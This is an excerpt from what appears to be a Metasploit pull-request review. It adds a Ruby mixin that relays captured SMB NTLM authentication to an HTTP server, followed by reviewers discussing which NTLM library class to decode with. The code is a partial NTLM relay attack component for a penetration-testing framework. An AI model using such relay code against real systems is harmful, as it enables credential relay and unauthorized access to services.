lib/msf/core/exploit/remote/smb/server/http_relay.rb

```diff
@@ -0,0 +1,162 @@
+###
+#
+# This mixin provides support for relaying smb logins to http servers
+#
+###
+
+module Msf::Exploit::Remote::SMB::Server::HttpRelay
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::NTLM::Client
+  include Msf::Exploit::Remote::SMB::Server::HashCapture
+
+  def post_login_action(client_socket, opts = {})
+    # overload for behavior after login
+  end
+
+  def http_client
+    return @http_client unless @http_client.nil?
+
+    @http_client = Rex::Proto::Http::Client.new(datastore['RHOST'],
+                                                datastore['RPORT'],
+                                                {},
+                                                datastore['SSL'],
+                                                datastore['ssl_version'],
+                                                proxies,
+                                                nil,
+                                                nil)
+    @http_client.connect
+    return @http_client
+  rescue Exception => e
+    print_error(e.to_s)
+    elog("Error connecting to Relay Target:\n #{e}")
+    raise e
+    return nil
+  end
+
+  def initial_handshake
+    vprint_status('Sending NTLM Handshake to HTTP Relay Target')
+    req = http_client.request_raw(
+      {
+        'method' => 'GET',
+        'uri' => @login_uri,
+        'headers' => {
+          'Accept-Encoding' => 'identity'
+        }
+      }
+    )
+    res = http_client._send_recv(req, @http_timeout, true)
+    return false if res.code != 401
+
+    return true
+  rescue Exception => e
+    print_error(e.to_s)
+    elog("Error on initial handshake:\n #{e}")
+    close http_client
+    raise e
+    return false
+  end
+
+  def relay_ntlm_type1(ntlm_type1)
+    vprint_status('Relaying NTLM Message 1 to HTTP Target')
+    return nil unless initial_handshake
+
+    # required to call encode64 on ntlm message
+    ntlm_type1.domain.force_encoding('ASCII-8BIT')
+    ntlm_type1.workstation.force_encoding('ASCII-8BIT')
+    req = http_client.request_raw(
+      {
+        'method' => 'GET',
+        'uri' => @login_uri,
+        'headers' => {
+          'Accept-Encoding' => 'identity',
+          'Authorization' => 'NTLM ' + ntlm_type1.encode64
+        }
+      }
+    )
+    res = http_client._send_recv(req, @http_timeout, true)
+    @ntlm_type1 = ntlm_type1
+    ntlm_type2_b64 = res.headers['WWW-Authenticate'].split[1]
+    ntlm_type2 = Net::NTLM::Message.decode64(ntlm_type2_b64)
```

Comment:
Should we be using this?

Reply:
Well...... that's why, I guess?
`[-] undefined method `decode64' for RubySMB::NTLM::Message:Module`

Reply:
Yes, so with rubyntlm 0.6.5 now released, we don't need all of the work arounds in the RubySMB::NTLM::Client. There's currently not any references to RubySMB::NTLM::Message, and my PR at rapid7/ruby_smb#272 actually removes it.

You'll want to keep it at Net::NTLM::Message to make it future proof.